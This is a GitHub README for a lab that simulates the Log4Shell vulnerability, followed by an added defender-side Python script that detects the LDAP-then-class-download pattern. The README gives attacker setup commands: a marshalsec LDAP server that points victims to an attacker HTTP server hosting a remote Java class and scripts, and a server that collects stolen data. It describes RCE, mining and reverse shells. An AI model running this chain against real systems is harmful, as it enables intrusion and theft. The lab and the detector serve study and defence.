
Demonstrated the Log4j 2.15 vulnerability by creating a vulnerable application server and an attacker server. Performed remote code execution, mining and a reverse shell on the vulnerable app server from the attacker server.

bhupendra-sharma/Simulation-of-Log4j-Vulnerability


Simulation-of-Log4j-Vulnerability

This project demonstrates various possible attacks on an application server using the vulnerable Log4j version 2.15 (officially labeled CVE-2021-44228 and known as "Log4Shell"). We created an attacker server and a vulnerable server for the demonstration. The attacker server contains a remote repository to store data from the vulnerable server, an LDAP server that is used to redirect the runtime of the vulnerable application server, and an HTTP server that is used to download malicious scripts onto the vulnerable server. We performed remote code execution, mining and a reverse shell.

Block Diagram

[Image: block diagram]

Instructions To Run Code:

The code contains Spring Boot applications (Gradle and Maven). IntelliJ IDEA 2021.3.3 (Ultimate Edition) needs to be installed to build and execute these applications. Below are the steps to run the applications that demonstrate the different components.

  1. To Host Application Server
    - Open the Server Packages (Vulnerable and Secure) in IntelliJ and perform a Build (Gradle) for these applications.
    - Run the Server Package using IntelliJ.

  2. To Host LDAP
    - Open the LDAP Host application in IntelliJ and perform a Build (Maven).
    - To execute the LDAP server, use the command below:

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "<Attacker-HTTP-Server-IP>:<Attacker-HTTP-Server-Port>/#<RemoteCodeClassName>"

  3. To Host Attacker HTTP-Server
    - python3 -m http.server <Attacker-HTTP-Server-Port>

  4. To Host Flask App for Attacker Remote Repository
    - python3 remote_repository.py

Note: The attacker HTTP server will contain a remote Java class file along with some shell script that contains the remote code the attacker needs to execute on the vulnerable server.
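
A defender-side view of the chain described above (an outbound LDAP connection followed by an HTTP download of a Java class file), as an added example that is not part of this repository: it scans egress records from application servers for that sequence. The log format, host names, addresses, the 30-second window and the function name `find_jndi_class_fetch` are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed egress records (format is an assumption, not from the repository):
# timestamp  source-host  destination  protocol  detail
SAMPLE_LOG = """\
2021-12-14T10:00:01Z app01 203.0.113.7 ldap bind
2021-12-14T10:00:02Z app01 203.0.113.7 http GET /Sample.class
2021-12-14T10:05:00Z app02 198.51.100.9 http GET /index.html
2021-12-14T10:06:00Z app03 192.0.2.10 ldap bind
2021-12-14T10:20:00Z app03 192.0.2.44 http GET /lib/Helper.class
"""

WINDOW = timedelta(seconds=30)  # assumed maximum gap between LDAP and class fetch


def parse(line):
    """Split one record into its five whitespace-separated fields."""
    ts, src, dst, proto, detail = line.split(maxsplit=4)
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "src": src, "dst": dst, "proto": proto, "detail": detail}


def find_jndi_class_fetch(log_text, window=WINDOW):
    """Alert when a host's outbound LDAP is followed by a .class download."""
    last_ldap = {}  # source host -> most recent outbound LDAP record
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse(line)
        if rec["proto"] == "ldap":
            last_ldap[rec["src"]] = rec
        elif rec["proto"] == "http":
            method, _, path = rec["detail"].partition(" ")
            path = path.split("?", 1)[0]  # ignore any query string
            ldap = last_ldap.get(rec["src"])
            if (method == "GET" and path.lower().endswith(".class") and ldap
                    and timedelta(0) <= rec["ts"] - ldap["ts"] <= window):
                alerts.append({"host": rec["src"], "ldap_server": ldap["dst"],
                               "http_server": rec["dst"], "path": path,
                               "same_server": ldap["dst"] == rec["dst"]})
    return alerts


if __name__ == "__main__":
    for alert in find_jndi_class_fetch(SAMPLE_LOG):
        print(alert)
```

Application servers rarely have a reason to open LDAP connections to external hosts, so the LDAP half of this sequence is also worth alerting on by itself where egress is not already blocked.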
